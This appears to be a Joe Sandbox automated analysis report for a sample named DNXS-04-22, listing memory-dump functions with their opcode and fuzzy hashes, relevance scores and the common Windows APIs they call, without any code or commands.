Uniqueness Score: -1.00%

Function 06772240 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a8d8b851c5afae86254fc897c78bbfb81782efa28dca828eefcb6d9a235bb0
Instruction ID: 90f7dc45ec11eb9d4fe9fa0b83c251840e714f486499e3ce1b6bd210a4d97a6a
Opcode Fuzzy Hash: 17a8d8b851c5afae86254fc897c78bbfb81782efa28dca828eefcb6d9a235bb0
Instruction Fuzzy Hash: 44A10874D00218CFEB24DFA9C444B9DBBB1FF89314F208269E419AB391DB749A85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 06772586 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a87853a769f926d4ca5155c803f64cb68099c562182452dd5fc57d7e6b133c2
Instruction ID: a4a67a3484a309d52f546504a039ddc46dde881f6a193c88c243a280da6c98e0
Opcode Fuzzy Hash: 6a87853a769f926d4ca5155c803f64cb68099c562182452dd5fc57d7e6b133c2
Instruction Fuzzy Hash: 0391E574D00218CFEB54DFA9C444B9CBBB1FF49310F208259E429AB292DB759A85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 028CC7B1 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbe659080366f269b71a6f5482e5acf0e0f8d9044b2817a5544293755efc12cf
Instruction ID: 2ca1b04c393b0abf0a45b77da5e6266d0bb3889ce41c60e86d02598998b0b7c1
Opcode Fuzzy Hash: fbe659080366f269b71a6f5482e5acf0e0f8d9044b2817a5544293755efc12cf
Instruction Fuzzy Hash: 398193B8E00218CFDB14DFA9D984A9DBBF2BF88305F24806AE409EB355DB349945CF11

Uniqueness

Uniqueness Score: -1.00%

Function 028CBC32 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58c15e06c889fa3c3efb49341ee0a3331ae3eb87b373470e75a60e77f754f029
Instruction ID: 6d35e036e56849000549e3e2d01e7208082052e2dcf86b03d583598ebcac78eb
Opcode Fuzzy Hash: 58c15e06c889fa3c3efb49341ee0a3331ae3eb87b373470e75a60e77f754f029
Instruction Fuzzy Hash: 4F81A7B8D00618CFEB14DFA9D985A9DBBF2BF88314F248069E409EB355DB309942CF51

Uniqueness

Uniqueness Score: -1.00%

Function 028CC1F0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c166f19d2343a1e9a347846aee3e31cfdb53fd9db3455ab4c5e5b719525f80c
Instruction ID: 2e05380f67ee5ae462096758214801d15527dc428c1b1ce534e8b6f3a179b4c1
Opcode Fuzzy Hash: 7c166f19d2343a1e9a347846aee3e31cfdb53fd9db3455ab4c5e5b719525f80c
Instruction Fuzzy Hash: 1E8185B8E00218CFDB14DFA9D984A9DBBB2BF89304F24906AE419EB355DB349945CF11

Uniqueness

Uniqueness Score: -1.00%

Function 028CBF10 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1058157d483f64fd095dcb130dbc92c404c61a7de7ef0dc68f431cc44ef5fa3b
Instruction ID: 622f6551092921f32a8916dcdbc3376287c84ec3ed46996e6701cb3dcf513fc9
Opcode Fuzzy Hash: 1058157d483f64fd095dcb130dbc92c404c61a7de7ef0dc68f431cc44ef5fa3b
Instruction Fuzzy Hash: 1281A6B8E00218CFDB14DFA9D984A9DBBF2BF88314F24806AE409EB355DB349945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 028CC4D0 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbddbe02413f466f23aee045b2f135e990e33357b6baaa4e5f35f3c3324cc1c0
Instruction ID: 35cbe690b2071ef2550a14f0dc2dad1bb7f3e725778d660cc5fc8321cabed9ea
Opcode Fuzzy Hash: cbddbe02413f466f23aee045b2f135e990e33357b6baaa4e5f35f3c3324cc1c0
Instruction Fuzzy Hash: 7181A5B8D00218CFDB14DFA9D984A9DBBF2BF88304F24906AE409EB355DB349945CF11

Uniqueness

Uniqueness Score: -1.00%

Function 028CCA91 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945a0cce9725d21f07123af700f843f20845ef3c4598511d082b06e902368898
Instruction ID: fc1bdad9dd201564fd78b1fd862d533427daadfe00f06b07a41d52a288518fb4
Opcode Fuzzy Hash: 945a0cce9725d21f07123af700f843f20845ef3c4598511d082b06e902368898
Instruction Fuzzy Hash: 75818778E00218CFEB14DFA9D984A9DBBB2BF88304F24806AD419E7365DB349945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 028C4B31 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52bcc56877bd12f0d691b4c53b0722511fed702875c2eaa21ae319f300624297
Instruction ID: eeb272bf4f86e984de8ad498f8cd010a813fcbcc4b3f2c8e34d85ff0f5976d7e
Opcode Fuzzy Hash: 52bcc56877bd12f0d691b4c53b0722511fed702875c2eaa21ae319f300624297
Instruction Fuzzy Hash: EF819778D00218DFEB14DFA9D994B9DBBF2BF88304F248069E419A7355DB349985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00E24B68 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00E24BE6
GetCurrentThread.KERNEL32 ref: 00E24C23
GetCurrentProcess.KERNEL32 ref: 00E24C60
GetCurrentThreadId.KERNEL32 ref: 00E24CB9

Strings

,i, xrefs: 00E24CA4
,N, xrefs: 00E24BA4

Memory Dump Source

Source File: 00000004.00000002.3785837724.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e20000_DNXS-04-22.jbxd

Similarity

API ID: Current$ProcessThread
String ID: ,N$,i
API String ID: 2063062207-1721297097
Opcode ID: 898502e4df60b9aac1e70cba03b16e8287545525e4c118a86702b1f136fd169c
Instruction ID: e90a3c83e87c0c69c8a67b9f1f936c79932518e6f2dba1bd921a58226ac329b4
Opcode Fuzzy Hash: 898502e4df60b9aac1e70cba03b16e8287545525e4c118a86702b1f136fd169c
Instruction Fuzzy Hash: 185164B49013098FEB14DFAAE949B9EBBF1BF88314F208019E409B73A0D7B55944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00E2F74D Relevance: 1.6, APIs: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E2F862

Memory Dump Source

Source File: 00000004.00000002.3785837724.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e20000_DNXS-04-22.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9119b1ab9abc5f1f419773a452c38a7c072e52811f267b88a699092c2806d1a4
Instruction ID: 801669bec921de16b0cc7e9f090cbb3ceffca2081baefc8e1722669553474870
Opcode Fuzzy Hash: 9119b1ab9abc5f1f419773a452c38a7c072e52811f267b88a699092c2806d1a4
Instruction Fuzzy Hash: DC51C1B5D00359DFDB18CFA9D884ADEFBB5BF48314F24812AE419AB250D7719845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00E2F750 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00E2F862

Memory Dump Source

Source File: 00000004.00000002.3785837724.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e20000_DNXS-04-22.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2353c61c5f65aca3ba348d6520245ea1a9b4942d4f43c61491b012d021861e0d
Instruction ID: 51de60bc18cbc0e2071929db0bcf0f6f846e50756d2dd81c8a8ea43ff98b5147
Opcode Fuzzy Hash: 2353c61c5f65aca3ba348d6520245ea1a9b4942d4f43c61491b012d021861e0d
Instruction Fuzzy Hash: B841CFB1D003599FDB18CF9AD884ADEFBB5BF48314F24812AE818AB210D7719845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0677BFC4 Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcaa5f5a6a137f1f6acb586d9819cfba2bab9ee6a8573d047dd8f4c4d9506b0d
Instruction ID: efd5d1df7f6136ddf5833ef77d2dee3fba5620dee56d58f06f95841372d7a975
Opcode Fuzzy Hash: fcaa5f5a6a137f1f6acb586d9819cfba2bab9ee6a8573d047dd8f4c4d9506b0d
Instruction Fuzzy Hash: 0B4124B8E04208DFDF54DF98D484AEDFBB2BF48714F648159E419AB281C731A986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0677BF64 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9cb4b7d70eec4df8fd74ef563544357cda3c47d822bb1952495c4609c624ec2
Instruction ID: 2733905c094036e3a333f37764a5dad37ecc25086c5f04f6ea13ae534d78ff89
Opcode Fuzzy Hash: c9cb4b7d70eec4df8fd74ef563544357cda3c47d822bb1952495c4609c624ec2
Instruction Fuzzy Hash: 4A4112B8E04208CFDF54CF98D584AEDBBB2FF48714F248159E409AB291C731A986CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F51BF0 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 00F51CB1

Memory Dump Source

Source File: 00000004.00000002.3786080895.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_DNXS-04-22.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: d5844ddadc21c032402de2d91c53763e8790e41ed6de93334750f6b7ff940370
Instruction ID: bac26c1a20d9a80c23c717257a6c3e58b09c237598fd56ede26a25595f2c4cb8
Opcode Fuzzy Hash: d5844ddadc21c032402de2d91c53763e8790e41ed6de93334750f6b7ff940370
Instruction Fuzzy Hash: AF4127B5900349CFDB14CF99C488BAABBF5FB88314F248459D919AB321D775A845CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F53328 Relevance: 1.6, APIs: 1, Instructions: 71
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 00F5418D

Memory Dump Source

Source File: 00000004.00000002.3786080895.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_DNXS-04-22.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0d0ddfe5866303663004368d6aa8d1d7889e7ae04fdf76cfa75323bdd636a1e8
Instruction ID: 4bea90e846d0bd619548829e6cd0b09998f8f441365798dd2ab742ac73cdad0b
Opcode Fuzzy Hash: 0d0ddfe5866303663004368d6aa8d1d7889e7ae04fdf76cfa75323bdd636a1e8
Instruction Fuzzy Hash: 7B21FF718093988FEB11CFADC8457DABFF0EF46320F14408BC544E7242C6349589CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0677BE18 Relevance: 1.6, APIs: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0677BE79

Memory Dump Source

Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 23a5a88305ff68b991aa2b341f776803be13729da9154c9dc8c95e0b19373d19
Instruction ID: 8ed6bc33cee01009edfee4dcf6aed8fb6d7ccbbf585c3ed0b5d3a2d93b14677a
Opcode Fuzzy Hash: 23a5a88305ff68b991aa2b341f776803be13729da9154c9dc8c95e0b19373d19
Instruction Fuzzy Hash: 85215CB1D052089BDB14DFAAD884BDEFBF6EF89310F24912AD514B7390D7705986CB90

Uniqueness

Uniqueness Score: -1.00%

Function 06778D94 Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 06778ED6

Memory Dump Source

Source File: 00000004.00000002.3789432754.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6770000_DNXS-04-22.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e80dfa2146ec3035f050d0e2e91f2be7d91c1282f997e7e606a53aa9b1f00e5e
Instruction ID: ff0ddd6e4036cccb92ee300a2382a6a85dd7a8c812b8301f5b074637b3cf5eca
Opcode Fuzzy Hash: e80dfa2146ec3035f050d0e2e91f2be7d91c1282f997e7e606a53aa9b1f00e5e
Instruction Fuzzy Hash: 2B113A74E002198FEF54DBA8D888AADB7F5FB88314F148265E858E7341D771EC41CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00E24DB0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E24E37

Memory Dump Source

Source File: 00000004.00000002.3785837724.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e20000_DNXS-04-22.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3d7a770138a7c100c7e9ac0dcb7a6702771f56ea115348aede2476a320dcc125
Instruction ID: fd9efff393bdab9254ad72d28a0d6d8a8eb397fac168ebcc54cb884e990a5492
Opcode Fuzzy Hash: 3d7a770138a7c100c7e9ac0dcb7a6702771f56ea115348aede2476a320dcc125
Instruction Fuzzy Hash: 5221E4B59003599FDB10CFAAD884ADEBBF9FB48310F14841AE914A7350C374A940CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00E2C148 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00E2D439,00000800,00000000,00000000), ref: 00E2D62A

Memory Dump Source

Source File: 00000004.00000002.3785837724.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e20000_DNXS-04-22.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 346a5c16e5086c6e5286652dcb7ba8b482eb7347c9ca98d528c57ad1f03271c7
Instruction ID: c0065c8eb9b09ac58e1d22bbada138603241b75666a4a5d3f0474d13f05d656a
Opcode Fuzzy Hash: 346a5c16e5086c6e5286652dcb7ba8b482eb7347c9ca98d528c57ad1f03271c7
Instruction Fuzzy Hash: 841103B69043598FDB10DF9AD844BDEFBF5EB88314F10842AD519B7200C3B5A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00E2D358 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00E2D3BE

Memory Dump Source

Source File: 00000004.00000002.3785837724.0000000000E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e20000_DNXS-04-22.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6dbd31b351beb960d8dd0e34c463b9694c9c1d37a3b7a9ecb97b958abfb3aee6
Instruction ID: 1d3385a0fe608f57797c00ad1b8830b5af20a7b454df96e193fc9cc4d8a2a64f
Opcode Fuzzy Hash: 6dbd31b351beb960d8dd0e34c463b9694c9c1d37a3b7a9ecb97b958abfb3aee6
Instruction Fuzzy Hash: 8D1110B5C003498FCB10DF9AD844BDEFBF4AB88324F20842AD519B7600C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F53318 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00F5418D

Memory Dump Source

Source File: 00000004.00000002.3786080895.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f50000_DNXS-04-22.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 2d7eebb85d2402ccdbb6ab4afe9594465cbe7366003b18784371f995744615e8
Instruction ID: 91d55c46b767abc12c35344d0e6bbd68f931012ea2378930d3499b1f3703e7ca
Opcode Fuzzy Hash: 2d7eebb85d2402ccdbb6ab4afe9594465cbe7366003b18784371f995744615e8
Instruction Fuzzy Hash: 561115B59007498FDB20DF9AD444B9EFBF8EB58324F208419D518A7200C375A984CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 028CFDA8 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

-)1#, xrefs: 028CFDC6

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID: -)1#
API String ID: 0-1789991113
Opcode ID: a507b82f59850099ffedf00b3a56cae70a28e02adaf49a72230951ea7045d968
Instruction ID: 0eb1cc19fc8acf8e85cb0e75174eee07df68be31c1abb91355f784c892c48168
Opcode Fuzzy Hash: a507b82f59850099ffedf00b3a56cae70a28e02adaf49a72230951ea7045d968
Instruction Fuzzy Hash: BD219379A00209CBEB14EBA8C1156DEBBB2AF44708F30841EC506FBB41CB75DE44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 028C7850 Relevance: .7, Instructions: 697COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27b586308c3003a2b508000a4f96c42b51eb81f06d3d64c4668b4c7a302aeec4
Instruction ID: a8ee3bf93647ac657862197fc9dfa31f3f50f627d6ad12a082fb4d78bef5f34f
Opcode Fuzzy Hash: 27b586308c3003a2b508000a4f96c42b51eb81f06d3d64c4668b4c7a302aeec4
Instruction Fuzzy Hash: 12521278A00218CFFB15DBE4D860B9EBB76EF89700F1080A9D10AAB355DF359E859F51

Uniqueness

Uniqueness Score: -1.00%

Function 028C6EB8 Relevance: .5, Instructions: 478COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccebfcbeb2684d1af29a80fdd4aa338c15dd92389f0ec52cbccb3862df2c6cef
Instruction ID: 95bd18b16f5ddf98de07f85ffda52627588ba29dc290ec13ca92350f4370a962
Opcode Fuzzy Hash: ccebfcbeb2684d1af29a80fdd4aa338c15dd92389f0ec52cbccb3862df2c6cef
Instruction Fuzzy Hash: 58124938A00219DFCB15CFA9D984A9EBBF6BF88314F648599E849DB261D730ED41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 028C0C8F Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2debf5eec765a1a88ffda4db31be8862c2d07683c8d6d287d00eacbaa7c01554
Instruction ID: 41ced4f2d55df9004ce094e07f969f8195f6ba6945944085a102b403128c1e04
Opcode Fuzzy Hash: 2debf5eec765a1a88ffda4db31be8862c2d07683c8d6d287d00eacbaa7c01554
Instruction Fuzzy Hash: 25227978A00219CFDB54EF64E894B9DBBB2FF88305F1085A5D909A73A9DB305D46CF41

Uniqueness

Uniqueness Score: -1.00%

Function 028CA878 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48d3976fee03264f1889e7248bc735f9531acdf94789779da5cd59d69826a6f5
Instruction ID: bc442a6f69942d27a812dfe48e792925f26bb26b1bf6d0d1bb85000ecc66fe96
Opcode Fuzzy Hash: 48d3976fee03264f1889e7248bc735f9531acdf94789779da5cd59d69826a6f5
Instruction Fuzzy Hash: 1DF13179A00619CFDB08CF68D584AADBBF6FF88714B268059E419EB361DB35EC41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 028C0CA0 Relevance: .4, Instructions: 410COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00c461839266462ab0de6f6290def437544b3b91c7e0a6e35484d3bc8e895c60
Instruction ID: a8e36a5ba25ea9a4eb4b826f76f3d9fd8269e937358ffe26dac8034caa452c8e
Opcode Fuzzy Hash: 00c461839266462ab0de6f6290def437544b3b91c7e0a6e35484d3bc8e895c60
Instruction Fuzzy Hash: 11227878A00219CFDB54EF64E894B9DBBB2FF88305F1085A5D909A73A9DB306D46CF41

Uniqueness

Uniqueness Score: -1.00%

Function 028C8849 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f386a4d3a4097c57e02998e443c7f760e877e5cd97d721a9d01cb56d81b67145
Instruction ID: 54dc52e0c68d35b6435c76dd0422c538755332d7349da18cb72eef02724ed28f
Opcode Fuzzy Hash: f386a4d3a4097c57e02998e443c7f760e877e5cd97d721a9d01cb56d81b67145
Instruction Fuzzy Hash: F1B1707C785205CFEB1A9A28D958B393796EF85748F2544AEE106CF3A1EB35CC42C742

Uniqueness

Uniqueness Score: -1.00%

Function 028C5700 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ea9b97af8d57d50284267b566ba0ab350ca40d7e3d31ca26650b2a1328b6de6
Instruction ID: d58a409f5219c7928f66308d96906963d45a18301d6d87175ca68f87d7beec49
Opcode Fuzzy Hash: 3ea9b97af8d57d50284267b566ba0ab350ca40d7e3d31ca26650b2a1328b6de6
Instruction Fuzzy Hash: 5191BD38704204CFDF199F24D858B2E7BA6EF89215F64896CE44ADB381DB78EC41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 028C5C60 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e60ae1ead04af1cd8ff0e87e4858e838d497cbaef67d13933cd215b3e9672917
Instruction ID: d9191754c4f5765eebb8279292260ce1eaae48ef87e673060336444fe856f7e9
Opcode Fuzzy Hash: e60ae1ead04af1cd8ff0e87e4858e838d497cbaef67d13933cd215b3e9672917
Instruction Fuzzy Hash: 7381717CA00205CFDF14CFA9C484AAAB7B2BF89208BA4816DD509EB365D735F841CB51

Uniqueness

Uniqueness Score: -1.00%

Function 028C7498 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d6b117f6ea84f6a643f48506582f0b6d2c89f9bf9d1a306ab8f2d14cd0074e3
Instruction ID: cb68f920deb3c7e6710be9aae3bd09827f60cff76f0301afac1fd56a1dbd2fbe
Opcode Fuzzy Hash: 6d6b117f6ea84f6a643f48506582f0b6d2c89f9bf9d1a306ab8f2d14cd0074e3
Instruction Fuzzy Hash: 2771F93C7002058FCB55DF29C498AADBBEAAF49714B2544A9E41ACB3B1DB71DC41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 028CD3C2 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3786481604.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_28c0000_DNXS-04-22.jbxd

Similarity

API ID:
String ID:
API String ID:
